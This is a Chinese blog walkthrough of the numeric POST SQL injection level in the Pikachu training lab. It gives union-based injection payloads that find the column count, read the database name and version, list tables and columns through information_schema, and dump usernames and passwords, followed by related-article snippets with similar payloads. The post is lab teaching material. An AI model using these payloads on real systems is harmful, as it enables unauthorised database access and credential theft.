pikachu靶场之SQL注入

最新推荐文章于 2024-09-01 18:06:09 发布
最新推荐文章于 2024-09-01 18:06:09 发布
阅读量366 收藏 3
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45440497/article/details/140656470
版权

一、数字型注入(post)

1、确认是否有注入点

抓包改为1=1:

而改成1=2,则

因此存在注入点,并判断是数字型注入(题目也说明了),不需要闭合符

2、找列

id=1 order by 1

直到order by 3,出错:Unknown column '3' in 'order clause' 

 

因此,确定为两列

3、判断每列显示的位置 

4、查询数据库名和数据库版本

id=-2 union select database(),version()

 

版本5.7.26(mysql5.0以上版本自带information_schema表 )

5、查询所有表

id=-2 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'

 

6、查询敏感表users表中所有列

id=-2 union select group_concat(column_name),2 from information_schema.columns where table_schema='pikachu' and table_name='users'

 

7、查询用户名和密码

id=-2 union select group_concat(username),group_concat(password) from users

8、将查到的密码解密

如,admin对应123456

 

则成功注入,获得用户名和密码。

参考:pikachu靶场全15关通过教程-CSDN博客 

田静怡
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场pikachu系列(sql注入)
weixin_45605313的博客
05-28 1358
SQL注入数字型POST字符型GET搜索型注入xx型注入insert/update注入 数字型POST 判断字段 order by 2成功回显 payload: 联合查询 id=1 union select database(),version()%23 暴库 id=1 union select database(),group_concat(schema_name) from information_schema.schemata%23 爆表 id=1 union select databas
Pikachu漏洞练习平台实验——SQL注入
m0_73826804的博客
02-22 2787
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图中下面的语句,这是条能被正常执行的SQL语句,导致表中的数据都会输出。
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 7044
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
小破站【pikachu 皮卡丘渗透靶场】 之 SQL注入 自学全套笔记
algae
04-16 4215
sql.txt大纲 数字型测试: $id=$_POST['id'] select 字段1,字段2 from 表名 where id = 1 or 1=1; 字符型测试: $uname=$_GET['username'] select 字段1,字段2 from 表名 where username='kobe' or 1=1#'; 搜索型测试: like '%%' ...
Pikachu靶场sql注入通关
oiadkt的博客
03-07 5097
pickchusql注入通关
Pikachu靶场SQL注入、远程代码执行、文件包含漏洞
Jach1n
02-01 698
Pikachu靶场SQL注入、远程代码执行、文件包含漏洞
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 870
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
pikachu靶场通关sql注入
08-10
- *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5205
Pikachu靶场Sql
SQL注入-Pikachu靶场通关_pikachu靶场通关sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 815
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
pikachu靶场 :四、SQL注入
qq_43233085的博客
01-30 2565
pikachu靶场 :四、SQL注入概述数字型注入(post)字符型注入(get)insert/update 注入insertupdatedelete 注入sql 盲注基于布尔基于时间宽字节注入 概述 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成...
皮卡丘靶场-sql注入详解
Mr_helloword的博客
07-31 1797
皮卡丘靶场-sql注入 数字型注入 这里为post传参,所以我们需要抓包 抓包后发现id,我们一般在后面输入 ’ " \来测试有无注入,发现有sql语句报错,而且没有数字1,这和题目提示的数字型注入一样 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200730155448929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNz
SQL进阶技巧:如何查询最近一笔有效订单? | 近距离有效匹配问题
石榴姐yyds
08-29 257
本文所分析的案例在实际场景中经常被用到,对于支持lag()函数 ignore nulls语法的数据库,本问题就很简单,但对于Hive等数据库不支持该语法时,略会麻烦一些,针对本题我们采用一分为二的方式,对订单有效和无效分开求解,当为有效值时候,利用ag()函数正常求解,当为无效时候,由于会存在多个连续状态一致的,为了能够获取最近有效的状态,我们采用last_value()函数ignore nulls语法来实现,最终通过coalesce()函数将两种状态合并,得到最终的结果。
九、安装artifactory并配置PostgreSQL--失败了
最新发布
shafatudou的博客
09-01 1282
基于八,克隆出一个新的虚拟机,用来安装制品库并配置mysql数据库。仅参考,未使用(配置的centos自带的数据库,不会用)
SQL经典五十道选刷
m0_67496588的博客
08-31 948
SQL经典五十道选刷
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值